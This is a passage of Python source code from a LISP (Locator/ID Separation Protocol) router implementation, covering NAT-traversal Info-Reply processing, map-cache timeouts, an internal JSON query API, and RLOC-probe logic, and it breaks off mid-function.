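# unless refreshed by another Info-Reply.
#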
def lisp_process_info_reply(source, packet, store):

    #
    # Parse Info-Reply.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return([None, None, False])

    info.print_info()

    #
    # Store any RTRs the Info-Reply advertised.
    #
    new_rtr_set = False
    for rtr in info.rtr_list:
        addr_str = rtr.print_address_no_iid()
        if (lisp_rtr_list.has_key(addr_str)):
            if (lisp_register_all_rtrs == False): continue
            if (lisp_rtr_list[addr_str] != None): continue
        new_rtr_set = True
        lisp_rtr_list[addr_str] = rtr

    #
    # An ITR points its default map-cache entries at the new RTR set,
    # once per configured instance-id.
    #
    if (lisp_i_am_itr and new_rtr_set):
        if (lisp_iid_to_interface == {}):
            lisp_update_default_routes(source, lisp_default_iid,
                lisp_rtr_list)
        else:
            for iid in lisp_iid_to_interface.keys():
                lisp_update_default_routes(source, int(iid), lisp_rtr_list)

    #
    # When not storing, just report what was learned.
    #
    if (store == False):
        return([info.global_etr_rloc, info.etr_port, new_rtr_set])

    #
    # Otherwise write the translated RLOC/port into the matching
    # database-mapping entries.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            rloc = rloc_entry.rloc
            interface = rloc_entry.interface
            if (interface == None):
                if (rloc.is_null()): continue
                if (rloc.is_local() == False): continue
                if (info.private_etr_rloc.is_null() == False and
                    rloc.is_exact_match(info.private_etr_rloc) == False):
                    continue
            elif (info.private_etr_rloc.is_dist_name()):
                rloc_name = info.private_etr_rloc.address
                if (rloc_name != rloc_entry.rloc_name): continue

            eid_str = green(db.eid.print_prefix(), False)
            rloc_str = red(rloc.print_address_no_iid(), False)

            same = info.global_etr_rloc.is_exact_match(rloc)
            if (rloc_entry.translated_port == 0 and same):
                lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
                    interface, eid_str))
                continue

            #
            # Skip when neither the translated address nor port changed.
            #
            translated = info.global_etr_rloc
            old_translated = rloc_entry.translated_rloc
            if (old_translated.is_exact_match(translated) and
                info.etr_port == rloc_entry.translated_port): continue

            lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
                format(red(info.global_etr_rloc.print_address_no_iid(),
                False), info.etr_port, rloc_str, interface, eid_str))

            rloc_entry.store_translated_rloc(info.global_etr_rloc,
                info.etr_port)

    return([info.global_etr_rloc, info.etr_port, new_rtr_set])
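#
# Callers use the store flag above in two ways: store=False just reports
# what the Info-Reply said ([global RLOC, translated port, new-RTR-set?]),
# while store=True additionally rewrites the translated RLOC/port into the
# matching database-mappings so future registrations advertise the NATed
# address.
#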
def lisp_test_mr(lisp_sockets, port):
    return                     # Early return leaves this test code disabled.
    lprint("Test Map-Resolvers")

    eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)

    #
    # Send IPv4 test Map-Requests.
    #
    eid.store_address("10.0.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)
    eid.store_address("192.168.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)

    #
    # Send IPv6 test Map-Requests.
    #
    eid6.store_address("0100::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)
    eid6.store_address("8000::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)

    #
    # Restart the periodic test timer.
    #
    timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
        [lisp_sockets, port])
    timer.start()
    return
def lisp_update_local_rloc(rloc):
    if (rloc.interface == None): return

    address = lisp_get_interface_address(rloc.interface)
    if (address == None): return

    old_addr = rloc.rloc.print_address_no_iid()
    new_addr = address.print_address_no_iid()

    if (old_addr == new_addr): return

    lprint("Local interface address changed on {} from {} to {}".format(
        rloc.interface, old_addr, new_addr))

    rloc.rloc.copy_address(address)
    lisp_myrlocs[0] = address
    return
def lisp_update_encap_port(mc):
    for rloc in mc.rloc_set:
        nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
        if (nat_info == None): continue
        if (rloc.translated_port == nat_info.port): continue

        lprint(("Encap-port changed from {} to {} for RLOC {}, " +
            "EID-prefix {}").format(rloc.translated_port, nat_info.port,
            red(rloc.rloc.print_address_no_iid(), False),
            green(mc.print_eid_tuple(), False)))

        rloc.store_translated_rloc(rloc.rloc, nat_info.port)
    return
def lisp_timeout_map_cache_entry(mc, delete_list):
    if (mc.map_cache_ttl == None):
        lisp_update_encap_port(mc)
        return([True, delete_list])

    now = lisp_get_timestamp()

    #
    # Entry still alive. Update the encap-port for NATed RLOCs while here.
    #
    if (mc.last_refresh_time + mc.map_cache_ttl > now):
        if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
        return([True, delete_list])

    #
    # Never time out the NAT-traversal default (0/0) entry.
    #
    if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
        return([True, delete_list])

    #
    # Entry timed out; queue it for deletion.
    #
    elapsed = lisp_print_elapsed(mc.last_refresh_time)
    prefix_str = mc.print_eid_tuple()
    lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
        format(green(prefix_str, False), bold("timed out", False), elapsed))

    delete_list.append(mc)
    return([True, delete_list])
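#
# Illustrative sketch only (hypothetical helper, not used by the release):
# the expiry test above reduced to one line. An entry last refreshed 90
# seconds ago with a 60-second TTL is expired.
#
def lisp_example_entry_expired(last_refresh_time, ttl):
    return(last_refresh_time + ttl <= lisp_get_timestamp())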
def lisp_timeout_map_cache_walk(mc, parms):
    delete_list = parms[0]
    checkpoint_list = parms[1]

    #
    # Unicast entry: test the TTL, and checkpoint entries being kept.
    #
    if (mc.group.is_null()):
        status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
        if (delete_list == [] or mc != delete_list[-1]):
            checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
        return([status, parms])

    if (mc.source_cache == None): return([True, parms])

    #
    # Multicast (S,G) entry: walk the per-group source cache.
    #
    parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
    return([True, parms])
def lisp_timeout_map_cache(lisp_map_cache):
    parms = [[], []]
    parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)

    #
    # Delete the entries that timed out.
    #
    delete_list = parms[0]
    for mc in delete_list: mc.delete_cache()

    #
    # Write a checkpoint file with the entries that remain.
    #
    checkpoint_list = parms[1]
    lisp_checkpoint(checkpoint_list)
    return
def lisp_store_nat_info(hostname, rloc, port):
    addr_str = rloc.print_address_no_iid()
    msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
        blue(hostname, False), red(addr_str, False), port)

    new_nat_info = lisp_nat_info(addr_str, hostname, port)

    if (lisp_nat_state_info.has_key(hostname) == False):
        lisp_nat_state_info[hostname] = [new_nat_info]
        lprint(msg.format("Store initial"))
        return(True)

    #
    # If the most recent entry already matches, just refresh its uptime.
    #
    nat_info = lisp_nat_state_info[hostname][0]
    if (nat_info.address == addr_str and nat_info.port == port):
        nat_info.uptime = lisp_get_timestamp()
        lprint(msg.format("Refresh existing"))
        return(False)

    #
    # Look for a matching entry further down the list so it can be moved
    # to the front.
    #
    old_entry = None
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str and nat_info.port == port):
            old_entry = nat_info
            break

    if (old_entry == None):
        lprint(msg.format("Store new"))
    else:
        lisp_nat_state_info[hostname].remove(old_entry)
        lprint(msg.format("Use previous"))

    existing = lisp_nat_state_info[hostname]
    lisp_nat_state_info[hostname] = [new_nat_info] + existing
    return(True)
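#
# The per-hostname list above is kept most-recently-used first, so
# lisp_get_nat_info() below returns the freshest translation. The boolean
# return value distinguishes "state changed" (True, the caller should act)
# from "same state refreshed" (False).
#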
def lisp_get_nat_info(rloc, hostname):
    if (lisp_nat_state_info.has_key(hostname) == False): return(None)

    addr_str = rloc.print_address_no_iid()
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str): return(nat_info)
    return(None)
def lisp_build_info_requests(lisp_sockets, dest, port):
    if (lisp_nat_traversal == False): return

    #
    # Build the destination list: the supplied dest, else all configured
    # map-resolvers, else all configured map-servers.
    #
    dest_list = []
    mr_list = []
    if (dest == None):
        for mr in lisp_map_resolvers_list.values():
            mr_list.append(mr.map_resolver)
        dest_list = mr_list
        if (dest_list == []):
            for ms in lisp_map_servers_list.values():
                dest_list.append(ms.map_server)
        if (dest_list == []): return
    else:
        dest_list.append(dest)

    #
    # Collect the local interface RLOCs from the database-mappings.
    #
    rloc_list = {}
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            lisp_update_local_rloc(rloc_entry)
            if (rloc_entry.rloc.is_null()): continue
            if (rloc_entry.interface == None): continue

            address = rloc_entry.rloc.print_address_no_iid()
            if (address in rloc_list): continue
            rloc_list[address] = rloc_entry.interface

    if (rloc_list == {}):
        lprint('Suppress Info-Request, no "interface = <device>" RLOC ' +
            "found in any database-mappings")
        return

    #
    # Send an Info-Request for each interface RLOC to each destination.
    #
    for address in rloc_list:
        interface = rloc_list[address]
        a = red(address, False)
        lprint("Build Info-Request for private address {} ({})".format(a,
            interface))
        device = interface if len(rloc_list) > 1 else None
        for dest in dest_list:
            lisp_send_info_request(lisp_sockets, dest, port, device)

    #
    # Re-resolve map-resolver DNS names in case their addresses changed.
    #
    if (mr_list != []):
        for mr in lisp_map_resolvers_list.values():
            mr.resolve_dns_name()
    return
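#
# Net effect of the loops above: one Info-Request per (local interface
# RLOC, destination) pair, and the device name is only passed along when
# more than one interface RLOC exists, so single-homed xTRs are not pinned
# to an interface.
#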
def lisp_valid_address_format(kw, value):
    if (kw != "address"): return(True)

    #
    # Distinguished-names are quoted strings.
    #
    if (value[0] == "'" and value[-1] == "'"): return(True)

    #
    # IPv4 address in dotted-decimal a.b.c.d format.
    #
    if (value.find(".") != -1):
        addr = value.split(".")
        if (len(addr) != 4): return(False)

        for byte in addr:
            if (byte.isdigit() == False): return(False)
            if (int(byte) > 255): return(False)
        return(True)

    #
    # Geo-prefix, a dash-separated string containing N/S/W/E letters.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        for geo in ["N", "S", "W", "E"]:
            if (geo in addr):
                if (len(addr) < 8): return(False)
                return(True)

    #
    # MAC address in xxxx-yyyy-zzzz format.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        if (len(addr) != 3): return(False)

        for hexgroup in addr:
            try: int(hexgroup, 16)
            except: return(False)
        return(True)

    #
    # IPv6 address with colon-separated hex groups; allow one "::".
    #
    if (value.find(":") != -1):
        addr = value.split(":")
        if (len(addr) < 2): return(False)

        found_null = False
        count = 0
        for hexgroup in addr:
            count += 1
            if (hexgroup == ""):
                if (found_null):
                    if (len(addr) == count): break
                    if (count > 2): return(False)
                found_null = True
                continue
            try: int(hexgroup, 16)
            except: return(False)
        return(True)

    #
    # E.164 telephone number, "+" followed by digits.
    #
    if (value[0] == "+"):
        addr = value[1::]
        for digit in addr:
            if (digit.isdigit() == False): return(False)
        return(True)
    return(False)
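#
# Examples of what the validator above accepts (shown as comments, not
# executed):
#
#   lisp_valid_address_format("address", "10.1.2.3")        # True, IPv4
#   lisp_valid_address_format("address", "10.1.2.256")      # False, octet
#   lisp_valid_address_format("address", "fe80::1")         # True, IPv6
#   lisp_valid_address_format("address", "0050-5600-0001")  # True, MAC
#   lisp_valid_address_format("address", "'web-server'")    # True, name
#   lisp_valid_address_format("other", "anything")          # True, skipped
#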
def lisp_process_api(process, lisp_socket, data_structure):
    api_name, parms = data_structure.split("%")

    lprint("Process API request '{}', parameters: '{}'".format(api_name,
        parms))

    data = []
    if (api_name == "map-cache"):
        if (parms == ""):
            data = lisp_map_cache.walk_cache(lisp_process_api_map_cache,
                data)
        else:
            data = lisp_process_api_map_cache_entry(json.loads(parms))

    if (api_name == "site-cache"):
        if (parms == ""):
            data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
                data)
        else:
            data = lisp_process_api_site_cache_entry(json.loads(parms))

    if (api_name == "site-cache-summary"):
        data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)

    if (api_name == "map-server"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(True, parms)

    if (api_name == "map-resolver"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(False, parms)

    if (api_name == "database-mapping"):
        data = lisp_process_api_database_mapping()

    #
    # Send the JSON-encoded response back to the lisp-core process.
    #
    data = json.dumps(data)
    ipc = lisp_api_ipc(process, data)
    lisp_ipc(ipc, lisp_socket, "lisp-core")
    return
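#
# A request arrives as "<api-name>%<json-parameters>". For example (an
# illustrative request string, not one taken from a log):
#
#   'map-cache%{"instance-id": "0", "eid-prefix": "10.0.0.0/8"}'
#
# looks up a single entry, while 'map-cache%' walks the whole cache.
#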
def lisp_process_api_map_cache(mc, data):

    #
    # Unicast entry: gather directly. Multicast entry: walk source cache.
    #
    if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))

    if (mc.source_cache == None): return([True, data])

    data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
    return([True, data])
def lisp_gather_map_cache_data(mc, data):
    entry = {}
    entry["instance-id"] = str(mc.eid.instance_id)
    entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
    if (mc.group.is_null() == False):
        entry["group-prefix"] = mc.group.print_prefix_no_iid()

    entry["uptime"] = lisp_print_elapsed(mc.uptime)
    entry["expires"] = lisp_print_elapsed(mc.uptime)
    entry["action"] = lisp_map_reply_action_string[mc.action]
    entry["ttl"] = "--" if mc.map_cache_ttl == None else \
        str(mc.map_cache_ttl / 60)

    #
    # Encode the RLOC-set; multicast RLOCs carry a member list.
    #
    rloc_set = []
    for rloc in mc.rloc_set:
        r = lisp_fill_rloc_in_json(rloc)

        if (rloc.rloc.is_multicast_address()):
            r["multicast-rloc-set"] = []
            for mrloc in rloc.multicast_rloc_probe_list.values():
                mr = lisp_fill_rloc_in_json(mrloc)
                r["multicast-rloc-set"].append(mr)

        rloc_set.append(r)

    entry["rloc-set"] = rloc_set

    data.append(entry)
    return([True, data])
def lisp_fill_rloc_in_json(rloc):
    r = {}
    if (rloc.rloc_exists()):
        r["address"] = rloc.rloc.print_address_no_iid()

    if (rloc.translated_port != 0):
        r["encap-port"] = str(rloc.translated_port)

    r["state"] = rloc.print_state()
    if (rloc.geo): r["geo"] = rloc.geo.print_geo()
    if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
    if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
    if (rloc.json): r["json"] = rloc.json.print_json(False)
    if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
    stats = rloc.stats.get_stats(False, False)
    if (stats): r["stats"] = stats
    r["uptime"] = lisp_print_elapsed(rloc.uptime)
    r["upriority"] = str(rloc.priority)
    r["uweight"] = str(rloc.weight)
    r["mpriority"] = str(rloc.mpriority)
    r["mweight"] = str(rloc.mweight)
    reply = rloc.last_rloc_probe_reply
    if (reply):
        r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
        r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)

    r["rloc-hop-count"] = rloc.rloc_probe_hops
    r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops

    r["rloc-probe-latency"] = rloc.rloc_probe_latency
    r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies

    rtts = []
    for rtt in rloc.recent_rloc_probe_rtts: rtts.append(str(rtt))
    r["recent-rloc-probe-rtts"] = rtts
    return(r)
def lisp_process_api_map_cache_entry(parms):
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Parse the EID, and the optional group for multicast entries.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])
    dest = eid
    source = eid

    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if (parms.has_key("group-prefix")):
        group.store_prefix(parms["group-prefix"])
        dest = group

    data = []
    mc = lisp_map_cache_lookup(source, dest)
    if (mc): status, data = lisp_process_api_map_cache(mc, data)
    return(data)
def lisp_process_api_site_cache_summary(site_cache):
    site_template = {"site": "", "registrations": []}
    entry_template = {"eid-prefix": "", "count": 0, "registered-count": 0}

    #
    # Count more-specific registrations under each accepting EID-prefix,
    # grouped by site name.
    #
    sites = {}
    for mask_len in site_cache.cache_sorted:
        for se in site_cache.cache[mask_len].entries.values():
            if (se.accept_more_specifics == False): continue
            if (sites.has_key(se.site.site_name) == False):
                sites[se.site.site_name] = []

            entry = copy.deepcopy(entry_template)
            entry["eid-prefix"] = se.eid.print_prefix()
            entry["count"] = len(se.more_specific_registrations)
            for ms in se.more_specific_registrations:
                if (ms.registered): entry["registered-count"] += 1

            sites[se.site.site_name].append(entry)

    data = []
    for site_name in sites:
        site = copy.deepcopy(site_template)
        site["site"] = site_name
        site["registrations"] = sites[site_name]
        data.append(site)

    return(data)
def lisp_process_api_site_cache(se, data):

    #
    # Unicast entry: gather directly. Multicast entry: walk source cache.
    #
    if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))

    if (se.source_cache == None): return([True, data])

    data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
    return([True, data])
def lisp_process_api_ms_or_mr(ms_or_mr, data):
    address = lisp_address(LISP_AFI_NONE, "", 0, 0)
    dns_name = data["dns-name"] if data.has_key("dns-name") else None
    if (data.has_key("address")):
        address.store_address(data["address"])

    #
    # Match on DNS name when given, otherwise on address.
    #
    value = {}
    if (ms_or_mr):
        for ms in lisp_map_servers_list.values():
            if (dns_name):
                if (dns_name != ms.dns_name): continue
            else:
                if (address.is_exact_match(ms.map_server) == False): continue

            value["dns-name"] = ms.dns_name
            value["address"] = ms.map_server.print_address_no_iid()
            value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
            return([value])
    else:
        for mr in lisp_map_resolvers_list.values():
            if (dns_name):
                if (dns_name != mr.dns_name): continue
            else:
                if (address.is_exact_match(mr.map_resolver) == False):
                    continue

            value["dns-name"] = mr.dns_name
            value["address"] = mr.map_resolver.print_address_no_iid()
            value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
            return([value])

    return([])
def lisp_process_api_database_mapping():
    data = []

    for db in lisp_db_list:
        entry = {}
        entry["eid-prefix"] = db.eid.print_prefix()
        if (db.group.is_null() == False):
            entry["group-prefix"] = db.group.print_prefix()

        rlocs = []
        for rloc_entry in db.rloc_set:
            rloc = {}
            if (rloc_entry.rloc.is_null() == False):
                rloc["rloc"] = rloc_entry.rloc.print_address_no_iid()
            if (rloc_entry.rloc_name != None):
                rloc["rloc-name"] = rloc_entry.rloc_name
            if (rloc_entry.interface != None):
                rloc["interface"] = rloc_entry.interface
            translated = rloc_entry.translated_rloc
            if (translated.is_null() == False):
                rloc["translated-rloc"] = translated.print_address_no_iid()

            if (rloc != {}): rlocs.append(rloc)

        #
        # Add the RLOC-set to the entry and the entry to the data set.
        #
        entry["rlocs"] = rlocs
        data.append(entry)

    return(data)
def lisp_gather_site_cache_data(se, data):
    entry = {}
    entry["site-name"] = se.site.site_name
    entry["instance-id"] = str(se.eid.instance_id)
    entry["eid-prefix"] = se.eid.print_prefix_no_iid()
    if (se.group.is_null() == False):
        entry["group-prefix"] = se.group.print_prefix_no_iid()

    entry["registered"] = "yes" if se.registered else "no"
    entry["first-registered"] = lisp_print_elapsed(se.first_registered)
    entry["last-registered"] = lisp_print_elapsed(se.last_registered)

    addr = se.last_registerer
    addr = "none" if addr.is_null() else addr.print_address()
    entry["last-registerer"] = addr
    entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
    entry["dynamic"] = "yes" if (se.dynamic) else "no"
    entry["site-id"] = str(se.site_id)
    if (se.xtr_id_present):
        entry["xtr-id"] = "0x" + lisp_hex_string(se.xtr_id)

    #
    # Encode the registered RLOC-set.
    #
    rloc_set = []
    for rloc in se.registered_rlocs:
        r = {}
        r["address"] = rloc.rloc.print_address_no_iid() if \
            rloc.rloc_exists() else "none"

        if (rloc.geo): r["geo"] = rloc.geo.print_geo()
        if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
        if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
        if (rloc.json): r["json"] = rloc.json.print_json(False)
        if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)

        rloc_set.append(r)

    entry["registered-rlocs"] = rloc_set

    data.append(entry)
    return([True, data])
def lisp_process_api_site_cache_entry(parms):
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Parse the EID, and the optional group for multicast entries.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])

    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if (parms.has_key("group-prefix")):
        group.store_prefix(parms["group-prefix"])

    data = []
    se = lisp_site_eid_lookup(eid, group, False)
    if (se): lisp_gather_site_cache_data(se, data)
    return(data)
def lisp_get_interface_instance_id(device, source_eid):
    interface = None
    if (lisp_myinterfaces.has_key(device)):
        interface = lisp_myinterfaces[device]

    #
    # No instance-id configured on the interface: use the default.
    #
    if (interface == None or interface.instance_id == None):
        return(lisp_default_iid)

    #
    # Multi-tenant interfaces: pick the tenant whose EID-prefix is the
    # longest match for the source EID.
    #
    iid = interface.get_instance_id()
    if (source_eid == None): return(iid)

    save_iid = source_eid.instance_id
    best = None
    for interface in lisp_multi_tenant_interfaces:
        if (interface.device != device): continue
        prefix = interface.multi_tenant_eid
        source_eid.instance_id = prefix.instance_id
        if (source_eid.is_more_specific(prefix) == False): continue
        if (best == None or
            best.multi_tenant_eid.mask_len < prefix.mask_len):
            best = interface

    source_eid.instance_id = save_iid

    if (best == None): return(iid)
    return(best.get_instance_id())
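#
# Multi-tenant resolution above is longest-match. With tenant prefixes
# 10.0.0.0/8 (IID 1) and 10.1.0.0/16 (IID 2) both configured on the same
# device, a source EID of 10.1.2.3 matches both but returns IID 2. (The
# prefixes and IIDs here are illustrative, not from a configuration.)
#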
def lisp_allow_dynamic_eid(device, eid):
    if (lisp_myinterfaces.has_key(device) == False): return(None)

    interface = lisp_myinterfaces[device]
    return_device = device if interface.dynamic_eid_device == None else \
        interface.dynamic_eid_device

    if (interface.does_dynamic_eid_match(eid)): return(return_device)
    return(None)
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
    global lisp_rloc_probe_timer

    if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()

    func = lisp_process_rloc_probe_timer
    timer = threading.Timer(interval, func, [lisp_sockets])
    lisp_rloc_probe_timer = timer
    timer.start()
    return
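#
# Cancel-then-start above guarantees at most one outstanding RLOC-probe
# timer; each expiry re-arms itself through
# lisp_process_rloc_probe_timer() -> lisp_start_rloc_probe_timer().
#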
def lisp_show_rloc_probe_list():
    lprint(bold("----- RLOC-probe-list -----", False))
    for key in lisp_rloc_probe_list:
        entries = lisp_rloc_probe_list[key]
        lprint("RLOC {}:".format(key))
        for rloc, eid, group in entries:
            lprint("  [{}, {}, {}, {}]".format(hex(id(rloc)),
                eid.print_prefix(), group.print_prefix(),
                rloc.translated_port))

    lprint(bold("---------------------------", False))
    return
#
# lisp_mark_rlocs_for_other_eids
#
# An RLOC has gone unreachable; mark the same RLOC unreachable for every
# other EID-prefix that uses it, and update the external data-plane.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
    rloc, eid, group = eid_list[0]
    eids = [lisp_print_eid_tuple(eid, group)]

    for rloc, eid, group in eid_list[1::]:
        rloc.state = LISP_RLOC_UNREACH_STATE
        rloc.last_state_change = lisp_get_timestamp()
        eids.append(lisp_print_eid_tuple(eid, group))

    unreach = bold("unreachable", False)
    rloc_str = red(rloc.rloc.print_address_no_iid(), False)

    for eid_str in eids:
        e = green(eid_str, False)
        lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))

    #
    # Write each affected map-cache entry to the external data-plane.
    #
    for rloc, eid, group in eid_list:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc): lisp_write_ipc_map_cache(True, mc)
    return

#
# lisp_process_rloc_probe_timer
#
# Probe timer expired: walk the RLOC-probe list and send an RLOC-probe
# Map-Request for each unique, probeable RLOC. The timer is re-armed first
# so probing continues on the next interval regardless of what happens in
# this pass.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
    lisp_set_exception()

    lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
    if (lisp_rloc_probing == False): return

    #
    # Debug code, when configured.
    #
    if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()

    #
    # Get default-route next-hops once, for the multi-homing checks below.
    #
    default_next_hops = lisp_get_default_route_next_hops()

    lprint("---------- Start RLOC Probing for {} entries ----------".format(
        len(lisp_rloc_probe_list)))

    #
    # Walk the probe list. Each value is a list of (rloc, eid, group)
    # tuples that share the same RLOC address.
    #
    count = 0
    probe = bold("RLOC-probe", False)
    for values in lisp_rloc_probe_list.values():
        last_rloc = None
        for parent_rloc, eid, group in values:
            addr_str = parent_rloc.rloc.print_address_no_iid()

            #
            # Don't probe gleaned EIDs unless configured to do so.
            #
            glean, rloc_probe, rr = lisp_allow_gleaning(eid, None,
                parent_rloc)
            if (glean and rloc_probe == False):
                e = green(eid.print_address(), False)
                addr_str += ":{}".format(parent_rloc.translated_port)
                lprint("Suppress probe to RLOC {} for gleaned EID {}".format(
                    red(addr_str, False), e))
                continue

            #
            # Don't probe RLOCs that are admin-down.
            #
            if (parent_rloc.down_state()): continue

            #
            # If several EID-prefixes share this RLOC, probe it once and
            # copy the probe state to the duplicates.
            #
            if (last_rloc):
                parent_rloc.last_rloc_probe_nonce = \
                    last_rloc.last_rloc_probe_nonce

                if (last_rloc.translated_port == parent_rloc.translated_port
                    and last_rloc.rloc_name == parent_rloc.rloc_name):
                    e = green(lisp_print_eid_tuple(eid, group), False)
                    lprint("Suppress probe to duplicate RLOC {} for {}".format(
                        red(addr_str, False), e))
                    parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
                    continue

            #
            # Walk the chain of RLOCs (one per next-hop when multi-homed).
            #
            nh = None
            rloc = None
            while (True):
                rloc = parent_rloc if rloc == None else rloc.next_rloc
                if (rloc == None): break

                #
                # If this RLOC's next-hop is no longer one of the default
                # route's next-hops, mark the RLOC unreachable and skip it.
                #
                if (rloc.rloc_next_hop != None):
                    if (rloc.rloc_next_hop not in default_next_hops):
                        if (rloc.up_state()):
                            device, gw = rloc.rloc_next_hop
                            rloc.state = LISP_RLOC_UNREACH_STATE
                            rloc.last_state_change = lisp_get_timestamp()
                            lisp_update_rtr_updown(rloc.rloc, False)
                            unreach = bold("unreachable", False)
                            lprint("Next-hop {}({}) for RLOC {} is {}".format(
                                gw, device, red(addr_str, False), unreach))
                        continue

                #
                # If already unreachable, wait a full probe interval before
                # probing again.
                #
                last = rloc.last_rloc_probe
                delta = 0 if last == None else time.time() - last
                if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
                    lprint("Waiting for probe-reply from RLOC {}".format(
                        red(addr_str, False)))
                    continue

                #
                # If a request-nonce timed out without being echoed, the
                # RLOC goes unreachable.
                #
                echo_nonce = lisp_get_echo_nonce(None, addr_str)
                if (echo_nonce and echo_nonce.request_nonce_timeout()):
                    rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
                    rloc.last_state_change = lisp_get_timestamp()
                    unreach = bold("unreachable", False)
                    lprint("RLOC {} went {}, nonce-echo failed".format(
                        red(addr_str, False), unreach))
                    lisp_update_rtr_updown(rloc.rloc, False)
                    continue

                #
                # A recent nonce-echo already proved reachability; suppress.
                #
                if (echo_nonce and echo_nonce.recently_echoed()):
                    lprint(("Suppress RLOC-probe to {}, nonce-echo " +
                        "received").format(red(addr_str, False)))
                    continue

                #
                # If no probe-reply arrived within the reply-wait window,
                # transition to unreachable (and mark the other EIDs that
                # use this RLOC), but keep probing it.
                #
                if (rloc.last_rloc_probe != None):
                    last = rloc.last_rloc_probe_reply
                    if (last == None): last = 0
                    delta = time.time() - last
                    if (rloc.up_state() and
                        delta >= LISP_RLOC_PROBE_REPLY_WAIT):
                        rloc.state = LISP_RLOC_UNREACH_STATE
                        rloc.last_state_change = lisp_get_timestamp()
                        lisp_update_rtr_updown(rloc.rloc, False)
                        unreach = bold("unreachable", False)
                        lprint("RLOC {} went {}, probe it".format(
                            red(addr_str, False), unreach))
                        lisp_mark_rlocs_for_other_eids(values)

                rloc.last_rloc_probe = lisp_get_timestamp()

                suffix = "" if rloc.unreach_state() == False else \
                    " unreachable"

                #
                # When multi-homed, install a host route so this probe goes
                # out this RLOC's next-hop.
                #
                nh_str = ""
                gw = None
                if (rloc.rloc_next_hop != None):
                    device, gw = rloc.rloc_next_hop
                    lisp_install_host_route(addr_str, gw, True)
                    nh_str = ", send on nh {}({})".format(gw, device)

                #
                # Show last computed RTT and RLOC-name, if any.
                #
                rtt = rloc.print_rloc_probe_rtt()
                astr = addr_str
                if (rloc.translated_port != 0):
                    astr += ":{}".format(rloc.translated_port)
                astr = red(astr, False)
                if (rloc.rloc_name != None):
                    astr += " (" + blue(rloc.rloc_name, False) + ")"
                lprint("Send {}{} {}, last rtt: {}{}".format(probe, suffix,
                    astr, rtt, nh_str))

                #
                # Save and remove any host route currently installed for
                # this RLOC so later probes can use a different next-hop.
                #
                if (rloc.rloc_next_hop != None):
                    nh = lisp_get_host_route_next_hop(addr_str)
                    if (nh): lisp_install_host_route(addr_str, nh, False)

                #
                # An RLOC with no address stored yet inherits the parent's.
                #
                if (rloc.rloc.is_null()):
